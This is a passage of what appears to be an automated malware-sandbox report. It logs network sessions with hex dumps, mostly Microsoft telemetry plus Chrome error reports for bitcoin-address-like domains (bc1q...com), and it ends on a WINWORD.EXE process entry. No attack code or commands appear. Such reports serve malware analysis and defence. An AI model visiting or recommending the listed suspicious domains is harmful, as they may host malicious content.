                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                              Host: fp.msedge.net
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-18 16:57:14 UTC431INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: public,max-age=900
                                                                                                                              Content-Length: 20022
                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                              ETag: "2038368832"
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Request-Context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309
                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                              X-MSEdge-Ref: Ref A: A90DBD2350704E5AA7139BE1F84BDCF2 Ref B: DFW311000105011 Ref C: 2024-11-18T16:57:13Z
                                                                                                                              Date: Mon, 18 Nov 2024 16:57:13 GMT
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:57:14 UTC1616INData Raw: 7b 22 73 22 3a 35 30 30 30 2c 22 6e 22 3a 33 2c 22 65 22 3a 5b 7b 22 65 22 3a 22 2a 2e 61 7a 72 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 6e 72 62 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 34 32 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 61 66 64 78 74 65 73 74 2e 7a 30 31 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 31 7d 2c 7b
                                                                                                                              Data Ascii: {"s":5000,"n":3,"e":[{"e":"*.azr.footprintdns.com","w":5000,"m":128},{"e":"*.clo.footprintdns.com","w":2000,"m":1},{"e":"*.clo.footprintdns.com","w":100,"m":128},{"e":"*.nrb.footprintdns.com","w":420,"m":3},{"e":"afdxtest.z01.azurefd.net","w":500,"m":1},{
                                                                                                                              2024-11-18 16:57:14 UTC2182INData Raw: 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 6e 34 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 6e 36 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 6e 37 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 6e 38 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 6e 39 70 72 64 61 70 70 30
                                                                                                                              Data Ascii: ":128},{"e":"bn4prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"bn6prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"bn7prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"bn8prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"bn9prdapp0
                                                                                                                              2024-11-18 16:57:14 UTC4096INData Raw: 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 71 31 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 76 6c 30 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65
                                                                                                                              Data Ascii: y-opaph.netmon.azure.com","w":3,"m":128},{"e":"cq1prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"c-ring.msedge.net","w":2000,"m":3},{"e":"c-ring-fallback.msedge.net","w":50,"m":3},{"e":"cvl02prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e
                                                                                                                              2024-11-18 16:57:14 UTC4096INData Raw: 3a 22 66 72 61 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 31 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74
                                                                                                                              Data Ascii: :"fra22prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"graph.azurefd.net","w":1,"m":1},{"e":"graph.azurefd.net
                                                                                                                              2024-11-18 16:57:14 UTC4096INData Raw: 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6f 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 6f 2d 72 69 6e 67 2d 66 61 6c 6c
                                                                                                                              Data Ascii: },{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"nag20prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"o-ring.msedge.net","w":100,"m":3},{"e":"o-ring-fall
                                                                                                                              2024-11-18 16:57:14 UTC3936INData Raw: 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 34 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 37 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65
                                                                                                                              Data Ascii: canary.netmon.azure.com","w":3,"m":128},{"e":"sn4prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"sn5azfapp01-canary.netmon.azure.us","w":3,"m":128},{"e":"sn5azfapp02-canary.netmon.azure.us","w":3,"m":128},{"e":"sn7prdapp01-canary-opaph.netmon.azure


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              63192.168.2.174985035.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:16 UTC576OUTOPTIONS /report/v4?s=J2C4pKO6cnPbHRruGHOZNcQA0VyqEiD%2Bt3nCfdaIscfNbn6pFRuEKBjZeL2WFFM51NtMomseZEz4%2Bdwlsc%2BO81oCgFXClsXY0OvqiDFWGABZgLIS%2BtY0bigb1RWBri%2BwwW7zHQr3aS69RUR%2FWddR2slU HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Origin: https://bc1qcr8muz00d2v7uqg5ggulrmm.com
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:57:16 UTC336INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              access-control-max-age: 86400
                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                              date: Mon, 18 Nov 2024 16:57:15 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              64192.168.2.174984935.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:16 UTC570OUTOPTIONS /report/v4?s=lJPJ1XU8p1%2FA3q2X1NQ8JsdII8OY3AVBqFMc19hM5ykp7KbUH4j5nzoiMgmWsaaktm8p2ZLb3I2qK6i7guV%2BtpcLiwYveLwgBWTZHN5LmDVlnDrSFprDZEVCQ2PgVJn0XbsY%2BBZ7r8guoyuhsdBZGlqm HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Origin: https://bc1qv5p8dwc98n3judrczkmpkjz.com
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:57:16 UTC336INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              access-control-max-age: 86400
                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                              date: Mon, 18 Nov 2024 16:57:16 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              65192.168.2.174985135.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:16 UTC582OUTOPTIONS /report/v4?s=DPuBwHkrbUzOURU2nDSpeticQUuCzdy4a1kViVnWYmzGeTlJGGcyz9MfjL%2FNE6bZY%2Bkdoa8FwBjnxePw9uMGIhd%2FH%2FPAS54zLgrkE9%2FSwoTwd7UdAlIqo845m%2FB%2B7u%2FtJv6pwmiH%2FkA5e4Gz042TA5B3 HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Origin: https://bc1qv5p8dwc98n3judrczkmpkjz.com
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:57:16 UTC336INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              access-control-max-age: 86400
                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                              date: Mon, 18 Nov 2024 16:57:16 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              66192.168.2.174985435.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:17 UTC496OUTPOST /report/v4?s=lJPJ1XU8p1%2FA3q2X1NQ8JsdII8OY3AVBqFMc19hM5ykp7KbUH4j5nzoiMgmWsaaktm8p2ZLb3I2qK6i7guV%2BtpcLiwYveLwgBWTZHN5LmDVlnDrSFprDZEVCQ2PgVJn0XbsY%2BBZ7r8guoyuhsdBZGlqm HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 445
                                                                                                                              Content-Type: application/reports+json
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:57:17 UTC445OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 33 34 31 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 36 35 2c 22 6d 65 74 68 6f 64 22 3a 22 4f 50 54 49 4f 4e 53 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 69 6d 65 73 6f 66 76 61 72 74 68 61 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                                              Data Ascii: [{"age":33411,"body":{"elapsed_time":2165,"method":"OPTIONS","phase":"application","protocol":"http/1.1","referrer":"https://timesofvartha.com/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":200,"type":"abandoned"},"type":"network-error
                                                                                                                              2024-11-18 16:57:17 UTC168INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              date: Mon, 18 Nov 2024 16:57:16 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              67192.168.2.174985335.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:17 UTC502OUTPOST /report/v4?s=J2C4pKO6cnPbHRruGHOZNcQA0VyqEiD%2Bt3nCfdaIscfNbn6pFRuEKBjZeL2WFFM51NtMomseZEz4%2Bdwlsc%2BO81oCgFXClsXY0OvqiDFWGABZgLIS%2BtY0bigb1RWBri%2BwwW7zHQr3aS69RUR%2FWddR2slU HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 416
                                                                                                                              Content-Type: application/reports+json
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:57:17 UTC416OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 34 34 33 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 33 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 63 31 71 63 72 38 6d 75 7a 30 30
                                                                                                                              Data Ascii: [{"age":54438,"body":{"elapsed_time":1137,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":405,"type":"http.error"},"type":"network-error","url":"https://bc1qcr8muz00
                                                                                                                              2024-11-18 16:57:17 UTC168INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              date: Mon, 18 Nov 2024 16:57:16 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              68192.168.2.174985252.108.10.254443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:17 UTC492OUTGET /apc/trans.gif?0fc259c7de35075dbd9af6fd5d2875fc HTTP/1.1
                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                                              Accept-Language: en-CH
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                              Host: wac-ring-fallback.msedge.net
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-18 16:57:17 UTC707INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                              Content-Length: 43
                                                                                                                              Content-Type: image/gif
                                                                                                                              Last-Modified: Sun, 13 Oct 2024 09:49:27 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Endpoint: SN4r8a
                                                                                                                              X-Frontend: AFD
                                                                                                                              X-Machinename: SN4AA2022403021
                                                                                                                              X-Userhostaddress: 155.94.241.0
                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                              X-MSEdge-Ref: Ref A: BBD84793C15B4C799A8E9F2FD3E1FABC Ref B: SN4AA2022403021 Ref C: 2024-11-18T16:57:17Z
                                                                                                                              Date: Mon, 18 Nov 2024 16:57:17 GMT
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:57:17 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              69192.168.2.174985535.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:17 UTC508OUTPOST /report/v4?s=DPuBwHkrbUzOURU2nDSpeticQUuCzdy4a1kViVnWYmzGeTlJGGcyz9MfjL%2FNE6bZY%2Bkdoa8FwBjnxePw9uMGIhd%2FH%2FPAS54zLgrkE9%2FSwoTwd7UdAlIqo845m%2FB%2B7u%2FtJv6pwmiH%2FkA5e4Gz042TA5B3 HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 416
                                                                                                                              Content-Type: application/reports+json
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:57:17 UTC416OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 37 34 30 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 39 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 63 31 71 76 35 70 38 64 77 63 39
                                                                                                                              Data Ascii: [{"age":27406,"body":{"elapsed_time":1295,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":405,"type":"http.error"},"type":"network-error","url":"https://bc1qv5p8dwc9
                                                                                                                              2024-11-18 16:57:17 UTC168INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              date: Mon, 18 Nov 2024 16:57:17 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              70192.168.2.174985652.108.10.254443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:18 UTC492OUTGET /apc/trans.gif?46f04eb983746b06c882a75823505167 HTTP/1.1
                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                                              Accept-Language: en-CH
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                              Host: wac-ring-fallback.msedge.net
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-18 16:57:18 UTC707INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                              Content-Length: 43
                                                                                                                              Content-Type: image/gif
                                                                                                                              Last-Modified: Sun, 13 Oct 2024 09:49:27 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Endpoint: SN4r8a
                                                                                                                              X-Frontend: AFD
                                                                                                                              X-Machinename: SN4AA2022401049
                                                                                                                              X-Userhostaddress: 155.94.241.0
                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                              X-MSEdge-Ref: Ref A: 7D6D7EFAC2E34C439FA676FF0FA47656 Ref B: SN4AA2022401049 Ref C: 2024-11-18T16:57:18Z
                                                                                                                              Date: Mon, 18 Nov 2024 16:57:17 GMT
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:57:18 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:11:55:19
                                                                                                                              Start date:18/11/2024
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                              Wow64 process (32bit):true
